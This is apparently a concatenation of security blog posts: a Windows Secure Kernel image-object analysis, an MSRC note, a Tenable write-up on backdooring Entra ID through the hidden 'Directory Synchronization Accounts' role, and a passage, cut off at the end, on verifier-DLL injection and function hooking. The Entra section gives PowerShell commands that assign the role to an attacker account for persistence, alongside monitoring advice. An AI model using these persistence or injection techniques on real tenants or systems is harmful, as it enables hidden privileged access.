The Secure Kernel maintains a table of all active Secure Images that are known. There are two very similar tables, which are used to track threads and NARs (securekernel!SkiThreadTable/securekernel!SkiNarTable). These are “sparse tables”. A sparse table is a computer science concept that effectively works like a static array of data, except that the data is ordered, which allows for faster lookups. It works by supporting 0x10000000 (268,435,456) entries. Note that these entries are not all allocated at once; they are simply “reserved” in the sense that the entries that are not in use are not mapped.

Secure Images are tracked via the securekernel!SkmiImageTable symbol. This table, as a side note, is initialized when the Secure Kernel initializes. The Secure Pool, the Secure Image infrastructure, and the Code Integrity infrastructure are initialized after the kernel-mode user-shared data page is mapped into the Secure Kernel.

The Secure Kernel first allocates an entry in the table where this Secure Image object will be stored. To calculate the index where the object will be stored, securekernel!SkmmAllocateSparseTableEntry is called. This creates a sizeof(ULONG_PTR) “index” structure, which determines the index into the table where the object is stored. In the case of storing a new entry, on 64-bit systems, the first 4 bytes provide the index and the last 4 bytes are unused (or, if they are used, I couldn’t see where). This is all done back in the original function, securekernel!SkmmCreateSecureImageSection, after the function which creates the Secure Image Context has returned.
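
A hedged interpretation of that sizeof(ULONG_PTR) “index” structure on 64-bit is below; the name and layout are assumptions based on the observed behavior.

typedef union _SK_SPARSE_TABLE_INDEX    // hypothetical name
{
    ULONG_PTR AsUlongPtr;
    struct
    {
        ULONG Index;    // low 4 bytes: index into the sparse table
        ULONG Unused;   // high 4 bytes: apparently unused for new entries
    } u;
} SK_SPARSE_TABLE_INDEX;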

As we can also see above, this is where our actual Secure Image object is created. As the functionality of securekernel!SkmmCreateSecureImageSection continues, this object will get filled out with more and more information. Some of the first data collected is whether the image is already loaded at a valid kernel address. From earlier in the blog, we mentioned that Secure Image creation occurs when an image is first mapped but not yet loaded. This seems to imply it is possible for a Secure Image to already be loaded at a valid kernel-mode address. If it is loaded, a bitwise OR happens with a mask of 0x1000 to indicate this. The entry point of the image is captured, and the previously-allocated Secure Image Context data is saved. Also among the first information collected are the virtual address and size of the Load Config Data Directory.

The next items start by determining if the image being loaded is characterized as a DLL (this is technically possible; for example, ci.dll is loaded into kernel-mode) by checking if the 13th bit is set in the FileHeader.Characteristics bitmask.
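
That check corresponds to IMAGE_FILE_DLL (0x2000, i.e., 1 << 13):

// NtHeaders is assumed to point at the image's nt!_IMAGE_NT_HEADERS64.
if (NtHeaders->FileHeader.Characteristics & 0x2000 /* IMAGE_FILE_DLL */) {
    // The image being loaded is characterized as a DLL (e.g., ci.dll).
}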

After this, the Secure Image creation logic will create an allocation based on the size of the image from NtHeaders->OptionalHeader->SizeOfImage. This allocation is not touched again during the initialization logic.

At this point, for each of the sections in the image, the prototype PTEs for the image are populated (via securekernel!SkmiPopulateImagePrototypes). If you are not familiar: when a memory region is shared between, for example, two processes, an issue arises at the PTE level. A prototype PTE allows the memory manager to easily track pages that are shared between two processes. As Windows Internals, 7th Edition, Part 1, Chapter 5 states - prototype PTEs are created for a pagefile-backed section object when it is first created. The same thing is effectively happening here, except instead of actually creating the prototype PTEs (because this is done in VTL 0), the Secure Kernel obtains a pointer to the prototype PTEs.

After this, additional section data and relocation information for the image is captured. This first starts by checking if the relocation information is stripped and, if the information hasn’t been stripped, the code captures the Image Data Directory associated with relocation information.

The next thing that occurs is that, again, each of the present sections is iterated over. This is done to capture some important information about each section in a memory allocation that is stored in the Secure Image object. Specifically, relocation information is being processed here. The Secure Image object creation logic will first allocate some memory in order to store the virtual address page number, the size of the raw data in number of pages, and the pointer to raw data for the section header that is currently being processed. As part of each check, the logic determines if the relocation table falls within the range of the current section. If it does, the file offset to the relocation table is calculated and stored in the Secure Image object.

Additionally, we saw previously that if the relocation information was stripped out of the image, the Secure Image object (at offsets 0x50 and 0x58) was updated with values of false and true (0 and 1), respectively. This seems to indicate why the relocation information may not be present. In this case, however, if the relocation information wasn’t stripped but there legitimately was no relocation information available (the Image Data Directory entry for the relocation data was zero), these boolean values are updated to true and false (1 and 0), respectively. This would seem to indicate to the Secure Image object why the relocation information may or may not be present.

The last bits of information the Secure Image object creation logic processes are:

  1. Is the image being processed a 64-bit executable image, or is the number of data directories at least 10 (decimal), enough to support the data directory we want to capture? If not, skip step 2.
  2. If the above is true, allocate and fill out the “Dynamic Relocation Data”

As a side-note, I only determined that the proper name for this data is “Dynamic Relocation Data” because of the routine securekernel!SkmiDeleteImage - which is responsible for deleting a Secure Image object when the object’s reference count reaches 0 (after we get through this last bit of information, we will talk about this routine in more detail). In the securekernel!SkmiDeleteImage logic, a few pointers in the object itself are checked to see if they are allocated. If they are, they are freed (this makes sense, as we have seen there have been many more memory allocations than just the object itself). SecureImageObject + 0xB8 is one of the places in the Secure Image object that is checked. If the allocation is present, a function called securekernel!SkmiFreeDynamicRelocationInfo is called to presumably free this memory.

This would indicate that the “Dynamic Relocation Data” is being created in the Secure Image object creation logic.

The information captured here refers to the load configuration Image Data Directory. The information about the load config data is verified, and the virtual address and size are captured and stored in the Secure Image object. This makes sense, as the dynamic relocation table is referenced through the load config directory of an executable.

This is the last information the Secure Image object needs for its initialization (we know more information will be collected after this Secure System Call returns)! The one parameter we haven’t touched in the securekernel!SkmmCreateSecureImageSection function is the last one, which is actually an output parameter. The output parameter is filled with the result of a call to securekernel!SkobCreateHandle.

If we look back at the initial Secure System Call dispatch function, this output parameter will be stored in the original Secure System Call arguments at offset 0x10 (16 decimal).

This handle is also stored in the Secure Image object itself. This also implies that when a Secure Image object is created, a handle to the object is returned to VTL 0/NT! This handle is eventually stored in the control area of the section object which backs the image (in VTL 0) itself, specifically in ControlArea->u2.e2.SeImageStub.StrongImageReference.

Note that the handle isn’t immediately stored in the Control Area of the section object. This happens later, as we will see in a subsequent blog post, but it is something to note here. As another point of note, the way I knew this handle would eventually be stored here is that when I was previously doing analysis on NAR/NTE creation, which we will eventually talk about, this handle value was the first parameter passed as part of the Secure System Call.

This pretty much sums up the instantiation of the initial Secure Image object. The object is now created but not finalized - much more data still needs to be validated. Because this further validation happens after the Secure System Call returns, I will save that analysis for another blog post. In the future post we will look at what ntoskrnl.exe, securekernel.exe, and skci.dll do with this object after the initial creation, before the image is actually fully loaded into VTL 0. Before we close this blog post, it is worth taking a look at the object itself and how it is treated by the Secure Kernel.

Secure Image Objects - Now What?

After the Secure Image object is created, the “clean-up” code at the end of the function (securekernel!SkmmCreateSecureSection) dereferences the object if it was created but a failure occurred while setting up the initial object. Notice that the object is dereferenced at 0x20 bytes before the actual object address.

What does this mean? Objects are prepended with a header that contains metadata about the object itself. Historically on Windows, the reference count for an object is contained in the object header (for the normal kernel this is nt!_OBJECT_HEADER). This tells us that each object managed by the Secure Kernel has a 0x20-byte header! Taking a look at securekernel!SkobpDereferenceObject, we can clearly see that within this header the reference count itself is stored at offset 0x18. We can also see that there is an object destructor contained in the header itself.
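
Here is a hypothetical reconstruction of that header layout. Only the 0x20-byte size and the reference count at offset 0x18 come from the analysis above; the remaining field positions, including the destructor’s, are assumptions for illustration:

typedef struct _SK_OBJECT_HEADER {
	PVOID Unknown0;        // +0x00 - unknown
	PVOID Unknown1;        // +0x08 - unknown
	PVOID Destructor;      // +0x10 - assumed position of the destructor seen in the header
	LONG64 ReferenceCount; // +0x18 - per securekernel!SkobpDereferenceObject
} SK_OBJECT_HEADER, *PSK_OBJECT_HEADER; // the object body begins at +0x20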

Just like regular NT objects, there is a similar “OBJECT_TYPE” setup (nt!PsProcessType, nt!PsThreadType, etc.). Taking a look at the image below, securekernel!SkmiImageType is used when referring to Secure Image Objects.

Existing art denotes that this object type pointer (securekernel!SkmiImageType) contains the destructor and size of the object. This can be corroborated by the interested reader by opening securekernel.exe as data in WinDbg (windbgx -z C:\Windows\system32\securekernel.exe) and looking at the object type directly. This reveals that for the securekernel!SkmiImageType symbol there is an object destructor and, as we saw earlier with the value 0xc8, the size of this type of object.

The following is a list of most of the valid objects in the Secure Kernel I located (although it is unclear without further analysis what many of them are used for):

  1. Secure Image Objects (securekernel!SkmiImageType)
  2. Secure HAL DMA Enabler Objects (securekernel!SkhalpDmaEnablerType)
  3. Secure HAL DMA Mapping Objects (securekernel!SkhalpDmaMappingType)
  4. Secure Enclave Objects (securekernel!SkmiEnclaveType)
  5. Secure Hal Extension Object (securekernel!SkhalExtensionType)
  6. Secure Allocation Object (securekernel!SkmiSecureAllocationType)
  7. Secure Thread Object (securekernel!SkeThreadType)
  8. Secure Shadow Synchronization Objects (events/semaphores) (securekernel!SkeShadowSyncObjectType)
  9. Secure Section Object (securekernel!SkmiSectionType)
  10. Secure Process Object (securekernel!SkpsProcessType)
  11. Secure Worker Factory Object (securekernel!SkeWorkerFactoryObjectType)
  12. Secure PnP Device Object (securekernel!SkPnpSecureDeviceObjectType)

Additional Resources

At the end of the analysis I did for this blog, I stumbled across some wonderful documents titled “Security Policy Document”. They are produced by Microsoft for FIPS (the Federal Information Processing Standard) and contain some additional insight into SKCI/CI. Additional documents on other Windows technologies can be found here.

Conclusion

I hope the reader found this blog at least somewhat enjoyable, even if it wasn’t new information to you. As always, if you have feedback, please don’t hesitate to reach out to me. I would also like to thank Andrea Allievi for answering a few of my questions about this blog post! I did not ask Andrea to review every single aspect of this post (so any errors in it are completely mine). If there are issues identified, please reach out to me so I can make edits!

Peace, love, and positivity!

Improved Guidance for Azure Network Service Tags

Summary: Microsoft Security Response Center (MSRC) was notified in January 2024 by our industry partner, Tenable Inc., about the potential for cross-tenant access to web resources using the service tags feature. Microsoft acknowledged that Tenable provided a valuable contribution to the Azure community by highlighting how easily the intended purpose and use of service tags can be misunderstood.

Stealthy Persistence with “Directory Synchronization Accounts” Role in Entra ID

Summary

The “Directory Synchronization Accounts” Entra role is very powerful (allowing privilege escalation to the Global Administrator role) while being hidden in the Azure portal and Entra admin center, in addition to being poorly documented, making it a perfect stealthy backdoor for persistence in Entra ID 🙈

This was discovered by Tenable Research while working on identity security.

“Directory Synchronization Accounts” role

Permissions inside Microsoft Entra ID (e.g. reset user password, change group membership, create applications, etc.) are granted through Entra roles. This article focuses on the “Directory Synchronization Accounts” role, one of the around 100 built-in Entra roles. This role has the ID “d29b2b05-8046-44ba-8758-1e26182fcf32”, it has the PRIVILEGED label that was recently introduced, and its description is:

This is a privileged role. Do not use. This role is automatically assigned to the Microsoft Entra Connect service, and is not intended or supported for any other use.

A privileged role that one should not use? It sounds like an invitation to me! 😉

The documentation seems to say that this special role cannot be freely assigned:

This special built-in role can’t be granted outside of the Microsoft Entra Connect wizard

This is incorrect, since it technically can be assigned, even if it shouldn’t be (pull-request to fix this).

Privileged role

I confirm that the role is privileged because, of course, it contains some permissions marked as privileged, but also because it has implicit permissions in the private undocumented “Azure AD Synchronization” API (not to be confused with the public “Microsoft Entra Synchronization” API).

These permissions allow escalation up to the Global Administrator role using several methods that we will see later💥

Normal usage by Microsoft Entra Connect

The normal usage of this role is indeed to be assigned to the Entra service account used by “Entra Connect” (formerly “Azure AD Connect”), i.e. the user named “On-Premises Directory Synchronization Service Account” which has a UPN with this syntax: “SYNC_<name of the on-prem server where Entra Connect runs>_<random id>@tenant.example.net”.

Even though it is not documented (I’ve proposed a pull-request to fix this), this role is also assigned to the similar Entra service account used by “Entra Cloud Sync” (formerly “Azure AD Connect Cloud Sync”), i.e. the user also named “On-Premises Directory Synchronization Service Account” but which has a UPN with this syntax: “[email protected]” instead.

This role grants the Entra service user the permissions it requires to perform its inter-directory provisioning duties, such as creating/updating hybrid Entra users from the on-premises AD users, updating their password in Entra when it changes in AD with Password Hash Sync enabled, etc.

Security defaults

Security defaults is a feature in Entra ID that activates multiple security features at once to increase security, notably requiring Multi-Factor Authentication (MFA). However, as documented by Microsoft and highlighted by Dr. Nestori Syynimaa @DrAzureAD, the “Directory Synchronization Accounts” role assignees are excluded from security defaults!

Pro tip for threat actors: Create your persistent account as directory synchronization account. It has nice permissions and excluded from security defaults 🥷 Pro tip for admins: Purchase Azure AD premium and block all users with that role (excluding the real sync account) 🔥 https://t.co/tm7YZtSdQv pic.twitter.com/RUnvILwucE

Nestori also confirmed that the limitation concerns all those assigned to the role (I’ve proposed a pull-request to update the doc).

Once again, I understand the need for this since the legitimate accounts are user accounts, thus subject to MFA rules. However, this could be abused by a malicious administrator who wants to avoid MFA 😉

Hidden role

Here is the proof that this role is hidden in the Azure portal / Entra admin center. See this Entra Connect service account apparently having 1 role assigned:

But no results are shown in the “Assigned roles” menu (same in the other tabs, e.g. “Eligible assignments”) 🤔:

Actually I tested it in several of my tenants and I noticed that the role was displayed in another tenant:

I suppose that the portal is running a different version of the code, perhaps due to a feature flag or A/B testing, because this one uses the MS Graph API (on graph.microsoft.com) to list the role assignments:

Whereas the other uses a private API (on api.azrbac.mspim.azure.com):

I noticed this difference last year when I initially reported this behavior to MSRC.

And what about the “Roles and administrators” menu? We should be able to see the “Directory Synchronization Accounts” built-in role there, shouldn’t we? Well, as you guessed, it’s hidden too 🙈 (in all my tenants: no difference here):

Note that for those that prefer it, the observations are identical in the Entra admin center.

I understand that Microsoft decided to hide it since this is a technical role that isn’t meant to be assigned by customers. A handful of other similar roles are hidden too. However, from a security perspective, I find it dangerous because organizations cannot use the Microsoft portals to see who may have this privileged role assigned illegitimately 😨! I reported this concern to MSRC (reference VULN-083495) last year, who confirmed that it was not a security issue and that they created a feature request to eventually improve the UX to help customers understand it.

This is the reason why I consider that this privileged role is a stealthy persistence method for attackers who compromised an Entra tenant.

Abuse methods

We will see how the security principals (users, but also service principals!) assigned to the “Directory Synchronization Accounts” role can elevate their privileges to the Global Administrator role! 😎

Password reset

There are several articles online explaining that the Entra Connect (ex- Azure AD Connect) service account in Entra ID is allowed to reset user passwords. One example is the “Unnoticed sidekick: Getting access to cloud as an on-prem admin” article by Dr. Nestori Syynimaa where “Set-AADIntUserPassword” is used.

I suppose this is allowed by the “microsoft.directory/passwordHashSync/allProperties/allTasks” Entra permission of the role, but I cannot check for sure.

There are some limitations though:

  • Only hybrid accounts (synchronized from on-premises AD) can be targeted (which was only recently fixed)
  • It only works if Password Hash Sync (PHS) is enabled, but the role allows enabling it
  • It only works via the private “Azure AD Synchronization” API, implemented in AADInternals, whose endpoint is https://adminwebservice.microsoftonline.com/provisioningservice.svc (not to be confused with other similarly named APIs: the public Microsoft Entra Synchronization API, or the private Azure AD Provisioning API). So, the reset must be done using the Set-AADIntUserPassword AADInternals PowerShell cmdlet.
  • It is not exploitable if the target has MFA or FIDO2 authentication enforced, since the password can still be reset but authentication won’t be possible

Add credentials to privileged application / service principal

The other interesting method was described by Fabian Bader in this article: “From on-prem to Global Admin without password reset”. I recommend that you read the original article but, in summary, the idea is to identify an application or service principal with powerful Microsoft Graph API permissions, then abuse the “microsoft.directory/applications/credentials/update” or “microsoft.directory/servicePrincipals/credentials/update” Entra permissions, which the “Directory Synchronization Accounts” role holds, to add credentials to it. This allows authenticating as the service principal and abusing the appropriate method corresponding to the dangerous Graph API permission to escalate to Global Admin.

This method was also described by Dirk-jan Mollema in this article: “Azure AD privilege escalation — Taking over default application permissions as Application Admin“.

Manage role assignment

Since one cannot manage this role using the Azure portal or Entra admin center, how can we list or manage its assignees? We will see how using the Microsoft Graph PowerShell SDK, since the Azure AD PowerShell module is now deprecated.

List role assignees

The Get-MgDirectoryRoleMember command lists the security principals assigned to a role. We reference the “Directory Synchronization Accounts” role by its well-known ID (as seen in the beginning) instead of its name for better reliability:

Connect-MgGraph -Scopes "Domain.Read.All"
$dirSync = Get-MgDirectoryRole -Filter "RoleTemplateId eq 'd29b2b05-8046-44ba-8758-1e26182fcf32'"
Get-MgDirectoryRoleMember -DirectoryRoleId $dirSync.Id | Format-List *

The output is not very consistent because role assignees are “security principals” which can be either users, groups, or service principals (undocumented 😉), so different types of objects.

In this example I have specified the “Domain.Read.All” Graph API permission when connecting, because it is usually already delegated, but the least privileged permission is actually “RoleManagement.Read.Directory”.

Add role assignment

And how would an attacker wishing to abuse this role for stealthy persistence assign it? With the New-MgRoleManagementDirectoryRoleAssignment command:

Connect-MgGraph -Scopes "RoleManagement.ReadWrite.Directory"
$dirSync = Get-MgDirectoryRole -Filter "RoleTemplateId eq 'd29b2b05-8046-44ba-8758-1e26182fcf32'"
$hacker = Get-MgUser -UserId [email protected]
New-MgRoleManagementDirectoryRoleAssignment -RoleDefinitionId $dirSync.Id -PrincipalId $hacker.Id -DirectoryScopeId "/"

In this example, I have specified the “RoleManagement.ReadWrite.Directory” Graph API permission when connecting, which is the least privileged permission.

Also, if this role has never been used in the tenant (for example if Entra Connect / Entra Cloud Sync was never configured), the role instance must be created from the role template before usage, with this command:

New-MgDirectoryRole -RoleTemplateId "d29b2b05-8046-44ba-8758-1e26182fcf32"

Remove role assignment

A malicious role assignment, or one which is a leftover from when the Entra tenant was hybrid, can be removed with the Remove-MgDirectoryRoleMemberByRef command:

$dirSync = Get-MgDirectoryRole -Filter "RoleTemplateId eq 'd29b2b05-8046-44ba-8758-1e26182fcf32'"
Remove-MgDirectoryRoleMemberByRef -DirectoryRoleId $dirSync.Id -DirectoryObjectId <object ID of the assignee to remove>

Recommendations

➡️ As a conclusion, my recommendation is to list and monitor the security principals assigned to the “Directory Synchronization Accounts” role. Since you cannot use the Azure portal / Entra admin center to see those, you must use the Graph API (or the deprecated Azure AD PowerShell module) as described above. Thankfully, you will soon be able to list all role assignees from the comfort of Tenable One or Tenable Identity Exposure.

🕵️ Any unrecognized suspicious assignee must be investigated because it may be a potential backdoor. Does it look like a legitimate Entra Connect or Entra Cloud Sync service user? Does its creation date correspond to the setup date of hybrid synchronization? Etc. Tenable Identity Exposure will soon add an Indicator of Exposure (IoE) allowing automatic identification of those suspicious “Directory Synchronization Accounts” role assignments, including more detailed recommendations.

🛡️ As a safety net, you can also follow Dr. Nestori Syynimaa’s recommendation to create a Conditional Access policy to block all users with that role, except the real legitimate synchronization user.

🤞 Finally, I hope that Microsoft will soon find a solution, with a better user experience, that discourages usage of the “Directory Synchronization Accounts” role without resorting to hiding it, so customers can use the Azure portal or Entra admin center to see the role and its assignees.


Stealthy Persistence with “Directory Synchronization Accounts” Role in Entra ID was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Building a Verifier DLL

The Application Verifier tool that is part of the Windows SDK provides a way to analyze processes for various types of misbehavior. The GUI provided looks like the following:

Application Verifier application window

To add an application, you can browse your file system and select an executable. The Application Verifier settings are based around the executable name only – not a full path. This is because verifier settings are stored in a subkey under Image File Execution Options with the name of the executable. For the notepad example above, you’ll find the following in the Registry:

Key for notepad.exe under the IFEO subkey

This IFEO subkey is used for NT Global Flags settings, one of which is using the Application Verifier. The GlobalFlag value is shown to be 0x100, which is the bit used for the verifier. Another way to set it without any extra information is using the GFlags tool, part of the Debugging Tools for Windows package:

GFlags tool

The Application Verifier lists a bunch of DLLs under the VerifierDLLs value. Each one must be located in the system directory (e.g., c:\Windows\System32). Full paths are not supported; this is intentional, because the list of DLLs is going to be loaded into any process running the specified executable, and it would be risky to load DLLs from arbitrary locations in the file system. The system directory, as well as the IFEO key, is normally write-accessible by administrators only.
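
For illustration, here is a minimal sketch of setting up these IFEO values programmatically (run elevated); the GlobalFlag and VerifierDlls value names come from the registry layout described above, while the exact value types are assumptions based on what the GUI and GFlags write:

#include <windows.h>
#include <stdio.h>

int main() {
	const wchar_t* subkey =
		L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\"
		L"Image File Execution Options\\notepad.exe";
	HKEY hKey;
	if (RegCreateKeyExW(HKEY_LOCAL_MACHINE, subkey, 0, nullptr, 0,
		KEY_SET_VALUE, nullptr, &hKey, nullptr) != ERROR_SUCCESS) {
		printf("Failed to open the IFEO key (are you running elevated?)\n");
		return 1;
	}
	DWORD globalFlag = 0x100; // FLG_APPLICATION_VERIFIER
	RegSetValueExW(hKey, L"GlobalFlag", 0, REG_DWORD,
		(const BYTE*)&globalFlag, sizeof(globalFlag));
	const wchar_t dlls[] = L"MyVerify.dll"; // must reside in System32
	RegSetValueExW(hKey, L"VerifierDlls", 0, REG_SZ,
		(const BYTE*)dlls, sizeof(dlls));
	RegCloseKey(hKey);
	return 0;
}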

The list of verifier DLLs is chosen based on the set of tests selected by the user on the right-hand side of the GUI. You’ll find subkeys that are used by the system-provided verifier DLLs with more settings related to the tests selected.

The nice thing about any verifier DLL specified is that these DLLs are loaded early in the process lifetime by verifier.dll (itself loaded by NTDLL.dll), before any other DLLs are loaded into the process. Even attaching a debugger to the process while launching it would “miss” the loading of these DLLs.

This behavior makes the technique attractive for injecting a DLL into arbitrary processes. It’s even possible to enable Application Verifier globally and dynamically (without the need to restart the system), so that these DLLs are injected into all processes (except protected processes).

Writing a Verifier DLL

Describing the Application Verifier tests is not the focus of this post. Rather, we’ll look into what it takes to create such a DLL that can be injected early and automatically into processes of our choice. As we’ll see, it’s not just about mere injection. The verifier infrastructure (part of verifier.dll) provides convenient facilities to hook functions.

If we create a standard DLL, set up the verifier entries while adding our DLL to the list of verifier DLLs (possibly removing the “standard” ones), and try to run our target executable (say, notepad), we get the following nasty message box:

The process shuts down, which means that if a verifier DLL fails to be properly processed, the process terminates rather than “skipping” the DLL.

Launching notepad with WinDbg spits out the following output:

ModLoad: 00007ff7`6dfa0000 00007ff7`6dfd8000   notepad.exe
ModLoad: 00007ffd`978f0000 00007ffd`97ae8000   ntdll.dll
ModLoad: 00007ffd`1f650000 00007ffd`1f6c4000   C:\Windows\System32\verifier.dll
Page heap: pid 0x10CEC: page heap enabled with flags 0x3.
AVRF: notepad.exe: pid 0x10CEC: flags 0x81643027: application verifier enabled
ModLoad: 00007ffc`cabd0000 00007ffc`cad6f000   C:\Windows\SYSTEM32\MyVerify.dll
ModLoad: 00007ffd`97650000 00007ffd`9770d000   C:\Windows\System32\KERNEL32.dll
ModLoad: 00007ffd`951b0000 00007ffd`954a6000   C:\Windows\System32\KERNELBASE.dll
AVRF: provider MyVerify.dll did not initialize correctly

Clearly the DLL did not initialize correctly, which is what the NTSTATUS 0xc0000142 was trying to tell us in the message box.

DLLs are initialized with the DllMain function that typically looks like this:

BOOL WINAPI DllMain(HMODULE hModule, DWORD reason, PVOID lpReserved) {
	switch (reason) {
		case DLL_PROCESS_ATTACH:
		case DLL_THREAD_ATTACH:
		case DLL_THREAD_DETACH:
		case DLL_PROCESS_DETACH:
			break;
	}
	return TRUE;
}

The classic four values shown are used by the DLL to run code when it’s loaded into a process (DLL_PROCESS_ATTACH), unloaded from a process (DLL_PROCESS_DETACH), a thread is created in the process (DLL_THREAD_ATTACH), and a thread is exiting in the process (DLL_THREAD_DETACH). It turns out that there is a fifth value, which must be used with verifier DLLs:

#define DLL_PROCESS_VERIFIER 4

Returning TRUE from such a case is not nearly enough. Instead, a structure expected by the caller of DllMain must be initialized and its address returned through lpReserved. The following structures and callback type definitions are needed:

typedef struct _RTL_VERIFIER_THUNK_DESCRIPTOR {
	PCHAR ThunkName;
	PVOID ThunkOldAddress;
	PVOID ThunkNewAddress;
} RTL_VERIFIER_THUNK_DESCRIPTOR, *PRTL_VERIFIER_THUNK_DESCRIPTOR;

typedef struct _RTL_VERIFIER_DLL_DESCRIPTOR {
	PWCHAR DllName;
	ULONG DllFlags;
	PVOID DllAddress;
	PRTL_VERIFIER_THUNK_DESCRIPTOR DllThunks;
} RTL_VERIFIER_DLL_DESCRIPTOR, *PRTL_VERIFIER_DLL_DESCRIPTOR;

typedef void (NTAPI* RTL_VERIFIER_DLL_LOAD_CALLBACK) (
	PWSTR DllName,
	PVOID DllBase,
	SIZE_T DllSize,
	PVOID Reserved);
typedef void (NTAPI* RTL_VERIFIER_DLL_UNLOAD_CALLBACK) (
	PWSTR DllName,
	PVOID DllBase,
	SIZE_T DllSize,
	PVOID Reserved);
typedef void (NTAPI* RTL_VERIFIER_NTDLLHEAPFREE_CALLBACK) (
	PVOID AllocationBase,
	SIZE_T AllocationSize);

typedef struct _RTL_VERIFIER_PROVIDER_DESCRIPTOR {
	ULONG Length;
	PRTL_VERIFIER_DLL_DESCRIPTOR ProviderDlls;
	RTL_VERIFIER_DLL_LOAD_CALLBACK ProviderDllLoadCallback;
	RTL_VERIFIER_DLL_UNLOAD_CALLBACK ProviderDllUnloadCallback;

	PWSTR VerifierImage;
	ULONG VerifierFlags;
	ULONG VerifierDebug;

	PVOID RtlpGetStackTraceAddress;
	PVOID RtlpDebugPageHeapCreate;
	PVOID RtlpDebugPageHeapDestroy;

	RTL_VERIFIER_NTDLLHEAPFREE_CALLBACK ProviderNtdllHeapFreeCallback;
} RTL_VERIFIER_PROVIDER_DESCRIPTOR;

That’s quite a list. The main structure is RTL_VERIFIER_PROVIDER_DESCRIPTOR, which has a pointer to an array of RTL_VERIFIER_DLL_DESCRIPTOR (the last element in the array must be all zeros), which in itself points to an array of RTL_VERIFIER_THUNK_DESCRIPTOR, used for specifying functions to hook. There are a few callbacks as well. At a minimum, we can define this descriptor like so (no hooking, no special code in callbacks):

RTL_VERIFIER_DLL_DESCRIPTOR noHooks{};

RTL_VERIFIER_PROVIDER_DESCRIPTOR desc = {
	sizeof(desc),
	&noHooks,
	[](auto, auto, auto, auto) {},
	[](auto, auto, auto, auto) {},
	nullptr, 0, 0,
	nullptr, nullptr, nullptr,
	[](auto, auto) {},
};

We can define these simply as global variables and return the address of desc in the handling of DLL_PROCESS_VERIFIER:

case DLL_PROCESS_VERIFIER:
	*(PVOID*)lpReserved = &desc;
	break;
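
Putting the pieces together, the entire entry point of a minimal verifier DLL might look like this (a sketch assuming the global desc defined above):

BOOL WINAPI DllMain(HMODULE hModule, DWORD reason, PVOID lpReserved) {
	switch (reason) {
		case DLL_PROCESS_VERIFIER:
			// hand our provider descriptor back to verifier.dll
			*(PVOID*)lpReserved = &desc;
			break;
	}
	return TRUE;
}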

With this code in place, we can try launching notepad again (after copying MyVerify.dll to the System32 directory). Here is the output from WinDbg:

ModLoad: 00007ff7`6dfa0000 00007ff7`6dfd8000   notepad.exe
ModLoad: 00007ffd`978f0000 00007ffd`97ae8000   ntdll.dll
ModLoad: 00007ffd`1f650000 00007ffd`1f6c4000   C:\Windows\System32\verifier.dll
Page heap: pid 0xB30C: page heap enabled with flags 0x3.
AVRF: notepad.exe: pid 0xB30C: flags 0x81643027: application verifier enabled
ModLoad: 00007ffd`25b50000 00007ffd`25cf1000   C:\Windows\SYSTEM32\MyVerify.dll
ModLoad: 00007ffd`97650000 00007ffd`9770d000   C:\Windows\System32\KERNEL32.dll
ModLoad: 00007ffd`951b0000 00007ffd`954a6000   C:\Windows\System32\KERNELBASE.dll
ModLoad: 00007ffd`963e0000 00007ffd`9640b000   C:\Windows\System32\GDI32.dll
ModLoad: 00007ffd`95790000 00007ffd`957b2000   C:\Windows\System32\win32u.dll
ModLoad: 00007ffd`95090000 00007ffd`951a7000   C:\Windows\System32\gdi32full.dll
...

This time it works. MyVerify.dll loads right after verifier.dll (which is the one managing verifier DLLs).

Hooking Functions

As mentioned before, we can use the verifier engine’s support for hooking functions in arbitrary DLLs. Let’s give this a try by hooking into a couple of functions, GetMessage and CreateFile. First, we need to set up the structures for the hooks on a per-DLL basis:

// forward declarations of the hook functions implemented below
BOOL WINAPI HookGetMessage(PMSG msg, HWND hWnd, UINT filterMin, UINT filterMax);
HANDLE WINAPI HookCreateFile(PCWSTR path, DWORD access, DWORD share, LPSECURITY_ATTRIBUTES sa, DWORD cd, DWORD flags, HANDLE hTemplate);

RTL_VERIFIER_THUNK_DESCRIPTOR user32Hooks[] = {
	{ (PCHAR)"GetMessageW", nullptr, HookGetMessage },
	{ nullptr, nullptr, nullptr },
};

RTL_VERIFIER_THUNK_DESCRIPTOR kernelbaseHooks[] = {
	{ (PCHAR)"CreateFileW", nullptr, HookCreateFile },
	{ nullptr, nullptr, nullptr },
};

The second NULL in each triplet is where the original address of the hooked function is stored by the verifier engine. Now we fill the structure with the list of DLLs, pointing to the hook arrays:

RTL_VERIFIER_DLL_DESCRIPTOR dlls[] = {
	{ (PWCHAR)L"user32.dll", 0, nullptr, user32Hooks },
	{ (PWCHAR)L"kernelbase.dll", 0, nullptr, kernelbaseHooks },
	{ nullptr, 0, nullptr, nullptr },
};

Finally, we update the main structure with the dlls array:

RTL_VERIFIER_PROVIDER_DESCRIPTOR desc = {
	sizeof(desc),
	dlls,
	[](auto, auto, auto, auto) {},
	[](auto, auto, auto, auto) {},
	nullptr, 0, 0,
	nullptr, nullptr, nullptr,
	[](auto, auto) {},
};

The last thing is to actually implement the hooks:

BOOL WINAPI HookGetMessage(PMSG msg, HWND hWnd, UINT filterMin, UINT filterMax) {
	// get original function
	static const auto orgGetMessage = (decltype(::GetMessageW)*)user32Hooks[0].ThunkOldAddress;
	auto result = orgGetMessage(msg, hWnd, filterMin, filterMax);
	char text[128];
	sprintf_s(text, "Received message 0x%X for hWnd 0x%p\n", msg->message, msg->hwnd);
	OutputDebugStringA(text);
	return result;
}

HANDLE WINAPI HookCreateFile(PCWSTR path, DWORD access, DWORD share, LPSECURITY_ATTRIBUTES sa, DWORD cd, DWORD flags, HANDLE hTemplate) {
	// get original function
	static const auto orgCreateFile = (decltype(::CreateFileW)*)kernelbaseHooks[0].ThunkOldAddress;
	auto hFile = orgCreateFile(path, access, share, sa, cd, flags, hTemplate);
	char text[512];
	if (hFile == INVALID_HANDLE_VALUE)
		sprintf_s(text, "Failed to open file %ws (%u)\n", path, ::GetLastError());
	else
		sprintf_s(text, "Opened file %ws successfully (0x%p)\n", path, hFile);

	OutputDebugStringA(text);
	return hFile;
}

The hooks just send some output with OutputDebugString. Here is an excerpt of the output when running notepad under a debugger:

ModLoad: 00007ff7`6dfa0000 00007ff7`6dfd8000   notepad.exe
ModLoad: 00007ffd`978f0000 00007ffd`97ae8000   ntdll.dll
ModLoad: 00007ffd`1f650000 00007ffd`1f6c4000   C:\Windows\System32\verifier.dll
Page heap: pid 0xEF18: page heap enabled with flags 0x3.
